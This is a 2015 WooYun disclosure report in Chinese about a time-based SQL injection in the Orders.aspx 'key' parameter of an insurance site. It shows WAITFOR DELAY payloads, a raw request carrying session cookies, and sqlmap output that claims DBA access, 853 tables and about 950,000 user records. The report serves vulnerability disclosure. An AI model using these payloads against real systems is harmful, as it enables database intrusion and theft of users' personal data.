当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165365

漏洞标题:保险安全之中民保险网一处SQL注入(DBA权限\853张表\大量用户)

相关厂商:中民保险网

漏洞作者: 故滨

提交时间:2015-12-28 13:10

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

又周一了啊

详细说明:

中民保险网地址:http://**.**.**.**/
首先登陆系统
目标链接

http://**.**.**.**/Orders.aspx?ser=1&state=0&field=name&key=1


进行测试,可以发现下面三个链接会延长对应的时间返回数据:

http://**.**.**.**/Orders.aspx?ser=1&state=0&field=name&key=1');WAITFOR DELAY '0:0:5'--
http://**.**.**.**/Orders.aspx?ser=1&state=0&field=name&key=1');WAITFOR DELAY '0:0:10'--
http://**.**.**.**/Orders.aspx?ser=1&state=0&field=name&key=1');WAITFOR DELAY '0:0:15'--


上sqlmap进行确认

GET /Orders.aspx?ser=1&state=0&field=name&key=123 HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Referer: http://**.**.**.**/Orders.aspx
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,en-US;q=0.4
Cookie: ASP.NET_SessionId=mfxkzguhyeiumoeckt2dsb45; PIDDAB666666=2015122614360017021548; userCookie=201512261435329884; FVTDAB666666=635867373617303074; userId=952368; LVTDAB666666=635868475845644595; VTSDAB666666=6; Hm_lvt_9634323798be51b19359016bdfd65b32=1451111733,1451111733,1451112795; Hm_lpvt_9634323798be51b19359016bdfd65b32=1451221954; VPSDAB666666=121; SIDDAB666666=dbbc95202b7140b8bcf73c5de7a3d3eb; LROIDDAB666666=1011


屏幕快照 2015-12-27 20.25.20.png


当前用户,DBA权限

屏幕快照 2015-12-27 21.44.16.png


获取所有的数据库:

available databases [9]:
[*] alliance2012
[*] alliancetest
[*] backtest
[*] distribution
[*] iscn2012
[*] master
[*] model
[*] msdb
[*] tempdb


一共853张表

屏幕快照 2015-12-28 10.51.25.png


看一下用户表的数据,一共951466条。

屏幕快照 2015-12-27 20.53.18.png


所有测试没有dump任何数据,延时大家都懂得,怕给跑坏了。。。

漏洞证明:

如上

修复方案:

你们懂得

版权声明:转载请注明来源 故滨@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-31 19:39

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价